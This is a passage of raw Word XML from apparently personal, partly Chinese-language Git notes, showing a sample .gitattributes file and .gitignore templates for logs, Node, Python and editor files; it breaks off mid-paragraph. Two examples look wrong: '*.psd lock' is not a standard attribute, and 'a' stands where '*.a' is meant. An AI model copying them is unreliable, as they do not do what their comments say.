    <w:p w14:paraId="73F272E7" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.psd lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372EF0F8" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example .gitattributes File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF270C" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Here's a sample .gitattributes file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E9BFBD" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DA155" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD31478" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t># Treat all text files as text and normalize line endings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC50A3A" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.txt text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21260340" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A578039" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t># Define image files as binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DED99C" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.jpg binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EF36A" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.png binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCF6C3" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.gif binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F354BC" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D066520" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t># Custom diff driver for Markdown files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19623247" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.md diff=markdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F835D" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CF821E" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t># Ignore all files in the `build/` directory during git archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF91FD" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>build/* export-ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B506FA1" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D7295C" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:lastRenderedPageBreak/>
        <w:t># Lock Photoshop files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145A9F44" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>*.psd lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739CBC75" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6BCA7" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>The .gitattributes file allows you to define how specific files or types of files should be treated by Git.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB03F17" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>It can manage text normalization, binary file handling, custom diff and merge strategies, and even how files are included or excluded from archives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167128D4" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="0058412C" w:rsidRDefault="0058412C" w:rsidP="0058412C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0058412C">
        <w:t>It is an essential tool for maintaining consistency in how files are handled across different environments and workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873D5C4" w14:textId="77777777" w:rsidR="0058412C" w:rsidRPr="00977DF5" w:rsidRDefault="0058412C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084D7DDE" w14:textId="77777777" w:rsidR="0058412C" w:rsidRDefault="0058412C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080D9ABA" w14:textId="77777777" w:rsidR="0058412C" w:rsidRDefault="0058412C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C18281E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc159779508"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：忽略不上传内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="65C7C204" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/github/gitignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AF95B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11ECF319" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc159779509"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="4A36D428" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58FE2455" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C4BAE7" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E430A95" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9C7BB" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm-debug.log*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656FFCFD" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>yarn-debug.log*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14496E9F" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>yarn-error.log*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60259523" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pnpm-debug.log*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD75594" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>lerna-debug.log*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFADDE5" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321F467A" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF7735" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED11A2" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dist-ssr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA448D" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4A0C0" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E87C330" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># big files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7957CF51" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9502F" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>backend/volume/media/documents/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3845FB5C" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>!backend/volume/media/documents/.gitkeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC8BB8E" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>backend/volume/media/import_excel_upload/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D02D34" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>!backend/volume/media/import_excel_upload/.gitkeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762C5B0" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>backend/volume/media/videos/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346A157" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>!backend/volume/media/videos/.gitkeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A88479" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EF0D05" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3446B" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>**/__pycache__/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4A147" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>**.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBE38E" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忽略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5925C" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>**/.idea/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC89BF" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>忽略虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD324F" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>**/venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FFD4E" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2575DF" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B27D25E" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Editor directories and files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE186C" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>**/.vscode/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BBAA85" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>!.vscode/extensions.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E898E80" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CAAB4" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.DS_Store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D8BF1" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.suo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E5A24" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.ntvs*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4FCC2" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.njsproj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A817B9D" w14:textId="77777777" w:rsidR="009148A6" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>*.sln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF978B0" w14:textId="44700768" w:rsidR="004C452C" w:rsidRDefault="009148A6" w:rsidP="009148A6">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>*.sw?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997E8ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc159779510"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他示例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="03CFC902" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555EFD55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>忽略所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> .a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>结尾的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38299B24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31982F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">lib.a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>除外</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA81054" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>!lib.a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76872467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>仅仅忽略项目根目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> TODO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件，不包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> subdir/TODO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C84F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
